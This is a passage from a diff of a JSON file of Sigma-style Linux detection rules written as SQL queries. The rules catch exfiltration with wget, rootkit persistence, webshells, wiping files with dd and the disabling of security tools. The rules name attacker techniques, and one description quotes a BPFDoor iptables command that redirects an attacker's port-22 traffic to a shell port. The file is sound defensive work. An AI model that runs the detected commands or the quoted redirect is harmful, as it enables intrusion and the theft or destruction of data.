ESCAPE '\\') OR (type = 'EXECVE' AND a0 = 'ufw' AND a1 LIKE '%delete%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_load_module_insmod.yml" + "filename": "lnx_auditd_modify_system_firewall.yml" }, { - "title": "Clipboard Collection with Xclip Tool - Auditd", - "id": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", - "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "title": "Steganography Hide Files with Steghide", + "id": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", + "description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", "author": "Pawel Mazur", "tags": [ - "attack.collection", - "attack.t1115" + "attack.defense_evasion", + "attack.t1027.003" ], "falsepositives": [ - "Legitimate usage of xclip tools" + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'xclip' AND a1 IN ('-selection', '-sel') AND a2 IN ('clipboard', 'clip') AND a3 = '-o')" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'steghide' AND a1 = 'embed' AND a2 IN ('-cf', '-ef') AND a4 IN ('-cf', '-ef'))" ], - "filename": "lnx_auditd_clipboard_collection.yml" + "filename": "lnx_auditd_steghide_embed_steganography.yml" }, { "title": "Linux Network Service Scanning - Auditd", @@ -662,548 +679,608 @@ "filename": "lnx_auditd_network_service_scanning.yml" }, { - "title": "Data Exfiltration with Wget", - "id": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", - "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", + "title": "Steganography Extract Files with Steghide", + "id": "a5a827d9-1bbe-4952-9293-c59d897eb41b", + "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", "author": "Pawel Mazur", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1027.003" ], "falsepositives": [ - "Legitimate usage of wget utility to post a file" + "Unknown" + ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'steghide' AND a1 = 'extract' AND a2 = '-sf' AND (a3 LIKE '%.jpg' ESCAPE '\\' OR a3 LIKE '%.png' ESCAPE '\\'))" + ], + "filename": "lnx_auditd_steghide_extract_steganography.yml" + }, + { + "title": "Overwriting the File with Dev Zero or Null", + "id": "37222991-11e9-4b6d-8bdf-60fbe48f753e", + "description": "Detects overwriting (effectively wiping/deleting) of a file.", + "author": "Jakob Weinzettl, oscd.community", + "tags": [ + "attack.impact", + "attack.t1485" + ], + "falsepositives": [ + "Appending null bytes to files.", + "Legitimate overwrite of files." + ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%dd%' ESCAPE '\\' AND (a1 LIKE '%if=/dev/null%' ESCAPE '\\' OR a1 LIKE '%if=/dev/zero%' ESCAPE '\\'))" + ], + "filename": "lnx_auditd_dd_delete_file.yml" + }, + { + "title": "Creation Of An User Account", + "id": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", + "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", + "author": "Marie Euler, Pawel Mazur", + "tags": [ + "attack.t1136.001", + "attack.persistence" + ], + "falsepositives": [ + "Admin activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'wget' AND a1 LIKE '--post-file=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((type = 'SYSCALL' AND exe LIKE '%/useradd' ESCAPE '\\') OR type LIKE 'ADD\\_USER' ESCAPE '\\')" + ], + "filename": "lnx_auditd_create_account.yml" + }, + { + "title": "System and Hardware Information Discovery", + "id": "1f358e2e-cb63-43c3-b575-dfb072a6814f", + "description": "Detects system information discovery commands", + "author": "Ömer Günal, oscd.community", + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "falsepositives": [ + "Legitimate administration activities" + ], + "level": "informational", + "rule": [ + "SELECT * FROM logs WHERE (type = 'PATH' AND (name LIKE '/sys/class/dmi/id/bios\\_version' ESCAPE '\\' OR name LIKE '/sys/class/dmi/id/product\\_name' ESCAPE '\\' OR name LIKE '/sys/class/dmi/id/chassis\\_vendor' ESCAPE '\\' OR name LIKE '/proc/scsi/scsi' ESCAPE '\\' OR name LIKE '/proc/ide/hd0/model' ESCAPE '\\' OR name LIKE '/proc/version' ESCAPE '\\' OR name LIKE '/etc/%version' ESCAPE '\\' OR name LIKE '/etc/%release' ESCAPE '\\' OR name LIKE '/etc/issue' ESCAPE '\\'))" ], - "filename": "lnx_auditd_data_exfil_wget.yml" + "filename": "lnx_auditd_system_info_discovery2.yml" }, { - "title": "Program Executions in Suspicious Folders", - "id": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", - "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Auditing Configuration Changes on Linux Host", + "id": "977ef627-4539-4875-adf4-ed8f780c4922", + "description": "Detect changes in auditd configuration files", + "author": "Mikhail Larin, oscd.community", "tags": [ - "attack.t1587", - "attack.t1584", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1562.006" ], "falsepositives": [ - "Admin activity (especially in /tmp folders)", - "Crazy web applications" + "Legitimate administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'SYSCALL' AND (exe LIKE '/tmp/%' ESCAPE '\\' OR exe LIKE '/var/www/%' ESCAPE '\\' OR exe LIKE '/home/%/public\\_html/%' ESCAPE '\\' OR exe LIKE '/usr/local/apache2/%' ESCAPE '\\' OR exe LIKE '/usr/local/httpd/%' ESCAPE '\\' OR exe LIKE '/var/apache/%' ESCAPE '\\' OR exe LIKE '/srv/www/%' ESCAPE '\\' OR exe LIKE '/home/httpd/html/%' ESCAPE '\\' OR exe LIKE '/srv/http/%' ESCAPE '\\' OR exe LIKE '/usr/share/nginx/html/%' ESCAPE '\\' OR exe LIKE '/var/lib/pgsql/data/%' ESCAPE '\\' OR exe LIKE '/usr/local/mysql/data/%' ESCAPE '\\' OR exe LIKE '/var/lib/mysql/%' ESCAPE '\\' OR exe LIKE '/var/vsftpd/%' ESCAPE '\\' OR exe LIKE '/etc/bind/%' ESCAPE '\\' OR exe LIKE '/var/named/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (type = 'PATH' AND (name LIKE '/etc/audit/%' ESCAPE '\\' OR name LIKE '/etc/libaudit.conf' ESCAPE '\\' OR name LIKE '/etc/audisp/%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_susp_exe_folders.yml" + "filename": "lnx_auditd_auditing_config_change.yml" }, { - "title": "CVE-2021-3156 Exploitation Attempt Bruteforcing", - "id": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing.\nrequired to trigger the heap-based buffer overflow.\n", - "author": "Bhabesh Raj", + "title": "Suspicious Commands Linux", + "id": "1543ae20-cbdf-4ec1-8d12-7664d667a825", + "description": "Detects relevant commands often related to malware or hacking activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "cve.2021.3156" + "attack.execution", + "attack.t1059.004" ], "falsepositives": [ - "Unknown" + "Admin activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM (SELECT *,count(*) AS agg FROM logs WHERE (type = 'SYSCALL' AND exe = '/usr/bin/sudoedit') GROUP BY host) WHERE agg > 50" + "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'chmod' AND a1 = '777') OR (type = 'EXECVE' AND a0 = 'chmod' AND a1 = 'u+s') OR (type = 'EXECVE' AND a0 = 'cp' AND a1 = '/bin/ksh') OR (type = 'EXECVE' AND a0 = 'cp' AND a1 = '/bin/sh'))" ], - "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml" + "filename": "lnx_auditd_susp_cmds.yml" }, { - "title": "Modify System Firewall", - "id": "323ff3f5-0013-4847-bbd4-250b5edb62cc", - "description": "Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.\nDetection rules that match only on the disabling of firewalls will miss this.\n", - "author": "IAI", + "title": "Masquerading as Linux Crond Process", + "id": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", + "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.t1562.004", - "attack.defense_evasion" - ], - "falsepositives": [ - "Legitimate admin activity" + "attack.defense_evasion", + "attack.t1036.003" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'iptables' AND a1 LIKE '%DROP%' ESCAPE '\\') OR (type = 'EXECVE' AND a0 = 'firewall-cmd' AND a1 LIKE '%remove%' ESCAPE '\\') OR (type = 'EXECVE' AND a0 = 'ufw' AND a1 LIKE '%delete%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (type = 'execve' AND a0 = 'cp' AND a1 = '-i' AND a2 = '/bin/sh' AND a3 LIKE '%/crond' ESCAPE '\\')" ], - "filename": "lnx_auditd_modify_system_firewall.yml" + "filename": "lnx_auditd_masquerading_crond.yml" }, { - "title": "Auditing Configuration Changes on Linux Host", - "id": "977ef627-4539-4875-adf4-ed8f780c4922", - "description": "Detect changes in auditd configuration files", - "author": "Mikhail Larin, oscd.community", + "title": "Triple Cross eBPF Rootkit Default Persistence", + "id": "1a2ea919-d11d-4d1e-8535-06cda13be20f", + "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1562.006" + "attack.t1053.003" ], "falsepositives": [ - "Legitimate administrative activity" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'PATH' AND (name LIKE '/etc/audit/%' ESCAPE '\\' OR name LIKE '/etc/libaudit.conf' ESCAPE '\\' OR name LIKE '/etc/audisp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%ebpfbackdoor' ESCAPE '\\'" ], - "filename": "lnx_auditd_auditing_config_change.yml" + "filename": "file_event_lnx_triple_cross_rootkit_persistence.yml" }, { - "title": "Possible Coin Miner CPU Priority Param", - "id": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", - "description": "Detects command line parameter very often used with coin miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via Sudoers Files", + "id": "ddb26b76-4447-4807-871f-1b035b2bfa5d", + "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.persistence", + "attack.t1053.003" ], "falsepositives": [ - "Other tools that use a --cpu-priority flag" + "Creation of legitimate files in sudoers.d folder part of administrator work" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (a1 LIKE '--cpu-priority%' ESCAPE '\\' OR a2 LIKE '--cpu-priority%' ESCAPE '\\' OR a3 LIKE '--cpu-priority%' ESCAPE '\\' OR a4 LIKE '--cpu-priority%' ESCAPE '\\' OR a5 LIKE '--cpu-priority%' ESCAPE '\\' OR a6 LIKE '--cpu-priority%' ESCAPE '\\' OR a7 LIKE '--cpu-priority%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE '/etc/sudoers.d/%' ESCAPE '\\'" ], - "filename": "lnx_auditd_coinminer.yml" + "filename": "file_event_lnx_persistence_sudoers_files.yml" }, { - "title": "Data Compressed", - "id": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "author": "Timur Zinniatullin, oscd.community", + "title": "Linux Doas Conf File Creation", + "id": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", + "description": "Detects the creation of doas.conf file in linux host platform.", + "author": "Sittikorn S, Teoderick Contreras", "tags": [ - "attack.exfiltration", - "attack.t1560.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Legitimate use of archiving tools by legitimate user." + "Unlikely" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((type = 'execve' AND a0 = 'zip') OR (type = 'execve' AND a0 = 'gzip' AND a1 = '-f') OR (type = 'execve' AND a0 = 'tar' AND a1 LIKE '%-c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%/etc/doas.conf' ESCAPE '\\'" ], - "filename": "lnx_auditd_data_compressed.yml" + "filename": "file_event_lnx_doas_conf_creation.yml" }, { - "title": "BPFDoor Abnormal Process ID or Lock File Accessed", - "id": "808146b2-9332-4d78-9416-d7e47012d83d", - "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", - "author": "Rafal Piasecki", + "title": "Triple Cross eBPF Rootkit Default LockFile", + "id": "c0239255-822c-4630-b7f1-35362bcb8f44", + "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106", - "attack.t1059" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'PATH' AND name IN ('/var/run/haldrund.pid', '/var/run/xinetd.lock', '/var/run/kdevrund.pid'))" + "SELECT * FROM logs WHERE TargetFilename = '/tmp/rootlog'" ], - "filename": "lnx_auditd_bpfdoor_file_accessed.yml" + "filename": "file_event_lnx_triple_cross_rootkit_lock_file.yml" }, { - "title": "Password Policy Discovery", - "id": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", - "description": "Detects password policy discovery commands", - "author": "Ömer Günal, oscd.community, Pawel Mazur", + "title": "Persistence Via Cron Files", + "id": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", + "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.discovery", - "attack.t1201" + "attack.persistence", + "attack.t1053.003" ], "falsepositives": [ - "Legitimate administration activities" + "Any legitimate cron file." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/pam.d/common-password', '/etc/security/pwquality.conf', '/etc/pam.d/system-auth', '/etc/login.defs')) OR (type = 'EXECVE' AND a0 = 'chage' AND a1 IN ('--list', '-l')) OR (type = 'EXECVE' AND a0 = 'passwd' AND a1 IN ('-S', '--status')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '/etc/cron.d/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.daily/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.hourly/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.monthly/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.weekly/%' ESCAPE '\\' OR TargetFilename LIKE '/var/spool/cron/crontabs/%' ESCAPE '\\') OR (TargetFilename LIKE '%/etc/cron.allow%' ESCAPE '\\' OR TargetFilename LIKE '%/etc/cron.deny%' ESCAPE '\\' OR TargetFilename LIKE '%/etc/crontab%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_password_policy_discovery.yml" + "filename": "file_event_lnx_persistence_cron_files.yml" }, { - "title": "Split A File Into Pieces - Linux", - "id": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", - "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", - "author": "Igor Fits, oscd.community", + "title": "Remove Immutable File Attribute", + "id": "34979410-e4b5-4e5d-8cfb-389fdff05c12", + "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1030" + "attack.defense_evasion", + "attack.t1222.002" ], "falsepositives": [ - "Legitimate administrative activity" + "Administrator interacting with immutable files (e.g. for instance backups)." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'SYSCALL' AND comm = 'split')" + "SELECT * FROM logs WHERE (Image LIKE '%/chattr' ESCAPE '\\' AND CommandLine LIKE '% -i %' ESCAPE '\\')" ], - "filename": "lnx_auditd_split_file_into_pieces.yml" + "filename": "proc_creation_lnx_chattr_immutable_removal.yml" }, { - "title": "System and Hardware Information Discovery", - "id": "1f358e2e-cb63-43c3-b575-dfb072a6814f", - "description": "Detects system information discovery commands", - "author": "Ömer Günal, oscd.community", + "title": "Chmod Suspicious Directory", + "id": "6419afd1-3742-47a5-a7e6-b50386cd15f8", + "description": "Detects chmod targeting files in abnormal directory paths.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.defense_evasion", + "attack.t1222.002" ], "falsepositives": [ - "Legitimate administration activities" + "Admin changing file permissions." ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'PATH' AND (name LIKE '/sys/class/dmi/id/bios\\_version' ESCAPE '\\' OR name LIKE '/sys/class/dmi/id/product\\_name' ESCAPE '\\' OR name LIKE '/sys/class/dmi/id/chassis\\_vendor' ESCAPE '\\' OR name LIKE '/proc/scsi/scsi' ESCAPE '\\' OR name LIKE '/proc/ide/hd0/model' ESCAPE '\\' OR name LIKE '/proc/version' ESCAPE '\\' OR name LIKE '/etc/%version' ESCAPE '\\' OR name LIKE '/etc/%release' ESCAPE '\\' OR name LIKE '/etc/issue' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/chmod' ESCAPE '\\' AND (CommandLine LIKE '%/tmp/%' ESCAPE '\\' OR CommandLine LIKE '%/.Library/%' ESCAPE '\\' OR CommandLine LIKE '%/etc/%' ESCAPE '\\' OR CommandLine LIKE '%/opt/%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_system_info_discovery2.yml" + "filename": "proc_creation_lnx_susp_chmod_directories.yml" }, { - "title": "Screen Capture with Import Tool", - "id": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", - "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", - "author": "Pawel Mazur", + "title": "Linux Webshell Indicators", + "id": "818f7b24-0fba-4c49-a073-8b755573b9c7", + "description": "Detects suspicious sub processes of web server processes", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Legitimate use of screenshot utility" + "Web applications that invoke Linux command line tools" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'import') AND ((a1 = '-window' AND a2 = 'root' AND (a3 LIKE '%.png' ESCAPE '\\' OR a3 LIKE '%.jpg' ESCAPE '\\' OR a3 LIKE '%.jpeg' ESCAPE '\\')) OR (a1 LIKE '%.png' ESCAPE '\\' OR a1 LIKE '%.jpg' ESCAPE '\\' OR a1 LIKE '%.jpeg' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((ParentImage LIKE '%/httpd' ESCAPE '\\' OR ParentImage LIKE '%/lighttpd' ESCAPE '\\' OR ParentImage LIKE '%/nginx' ESCAPE '\\' OR ParentImage LIKE '%/apache2' ESCAPE '\\' OR ParentImage LIKE '%/node' ESCAPE '\\' OR ParentImage LIKE '%/caddy' ESCAPE '\\') OR (ParentCommandLine LIKE '%/bin/java%' ESCAPE '\\' AND ParentCommandLine LIKE '%tomcat%' ESCAPE '\\') OR (ParentCommandLine LIKE '%/bin/java%' ESCAPE '\\' AND ParentCommandLine LIKE '%websphere%' ESCAPE '\\')) AND (Image LIKE '%/whoami' ESCAPE '\\' OR Image LIKE '%/ifconfig' ESCAPE '\\' OR Image LIKE '%/ip' ESCAPE '\\' OR Image LIKE '%/bin/uname' ESCAPE '\\' OR Image LIKE '%/bin/cat' ESCAPE '\\' OR Image LIKE '%/bin/crontab' ESCAPE '\\' OR Image LIKE '%/hostname' ESCAPE '\\' OR Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\' OR Image LIKE '%/pwd' ESCAPE '\\' OR Image LIKE '%/route' ESCAPE '\\'))" ], - "filename": "lnx_auditd_screencapture_import.yml" + "filename": "proc_creation_lnx_webshell_detection.yml" }, { - "title": "Bpfdoor TCP Ports Redirect", - "id": "70b4156e-50fc-4523-aa50-c9dddf1993fc", - "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", - "author": "Rafal Piasecki", + "title": "Linux Base64 Encoded Shebang In CLI", + "id": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", + "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1140" ], "falsepositives": [ - "Legitimate ports redirect" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 LIKE '%iptables' ESCAPE '\\' AND a1 = '-t' AND a2 = 'nat') AND (logs MATCH ('\"--to-ports 42\" OR \"--to-ports 43\"')))" + "SELECT * FROM logs WHERE (CommandLine LIKE '%IyEvYmluL2Jhc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL2Rhc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL3pza%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL2Zpc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL3No%' ESCAPE '\\')" ], - "filename": "lnx_auditd_bpfdoor_port_redirect.yml" + "filename": "proc_creation_lnx_base64_shebang_cli.yml" }, { - "title": "Modification of ld.so.preload", - "id": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", - "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Connection Proxy", + "id": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", + "description": "Detects setting proxy configuration", + "author": "Ömer Günal", "tags": [ "attack.defense_evasion", - "attack.t1574.006" + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate administration activities" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type = 'PATH' AND name = '/etc/ld.so.preload')" + "SELECT * FROM logs WHERE (CommandLine LIKE '%http\\_proxy=%' ESCAPE '\\' OR CommandLine LIKE '%https\\_proxy=%' ESCAPE '\\')" ], - "filename": "lnx_auditd_ld_so_preload_mod.yml" + "filename": "proc_creation_lnx_proxy_connection.yml" }, { - "title": "Steganography Hide Files with Steghide", - "id": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", - "description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", - "author": "Pawel Mazur", + "title": "Apt GTFOBin Abuse - Linux", + "id": "bb382fd5-b454-47ea-a264-1828e4c766d6", + "description": "Detects usage of \"apt\" and \"apt-get\" as a GTFOBin to execute and proxy command and binary execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.003" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'steghide' AND a1 = 'embed' AND a2 IN ('-cf', '-ef') AND a4 IN ('-cf', '-ef'))" + "SELECT * FROM logs WHERE ((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND CommandLine LIKE '%APT::Update::Pre-Invoke::=%' ESCAPE '\\')" ], - "filename": "lnx_auditd_steghide_embed_steganography.yml" + "filename": "proc_creation_lnx_gtfobin_apt.yml" }, { - "title": "Clipboard Collection of Image Data with Xclip Tool", - "id": "f200dc3f-b219-425d-a17e-c38467364816", - "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "author": "Pawel Mazur", + "title": "Disabling Security Tools", + "id": "e3a8a052-111f-4606-9aee-f28ebeb76776", + "description": "Detects disabling security tools", + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "tags": [ - "attack.collection", - "attack.t1115" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage of xclip tools" + "Legitimate administration activities" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'xclip' AND a1 IN ('-selection', '-sel') AND a2 IN ('clipboard', 'clip') AND a3 = '-t' AND a4 LIKE 'image/%' ESCAPE '\\' AND a5 = '-o')" + "SELECT * FROM logs WHERE ((Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%iptables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%ip6tables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%iptables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%ip6tables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%firewalld%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%firewalld%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (Image LIKE '%/setenforce' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%falcon-sensor%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\' AND CommandLine LIKE '%falcon-sensor%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_clipboard_image_collection.yml" + "filename": "proc_creation_lnx_security_tools_disabling.yml" }, { - "title": "Screen Capture with Xwd", - "id": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", - "description": "Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", - "author": "Pawel Mazur", + "title": "Mount Execution With Hidepid Parameter", + "id": "ec52985a-d024-41e3-8ff6-14169039a0b3", + "description": "Detects execution of the \"mount\" command with \"hidepid\" parameter to make invisible processes to other users from the system", + "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "tags": [ - "attack.collection", - "attack.t1113" + "attack.credential_access", + "attack.t1564" ], "falsepositives": [ - "Legitimate use of screenshot utility" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'xwd') AND ((a1 = '-root' AND a2 = '-out' AND a3 LIKE '%.xwd' ESCAPE '\\') OR (a1 = '-out' AND a2 LIKE '%.xwd' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Image LIKE '%/mount' ESCAPE '\\' AND CommandLine LIKE '%hidepid=2%' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\')" ], - "filename": "lnx_auditd_screencaputre_xwd.yml" + "filename": "proc_creation_lnx_mount_hidepid.yml" }, { - "title": "Unix Shell Configuration Modification", - "id": "a94cdd87-6c54-4678-a6cc-2814ffe5a13d", - "description": "Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.", - "author": "Peter Matkovski, IAI", + "title": "Potential Netcat Reverse Shell Execution", + "id": "7f734ed0-4f47-46c0-837f-6ee62505abd9", + "description": "Detects execution of netcat with the \"-e\" flag followed by common shells. This could be a sign of a potential reverse shell 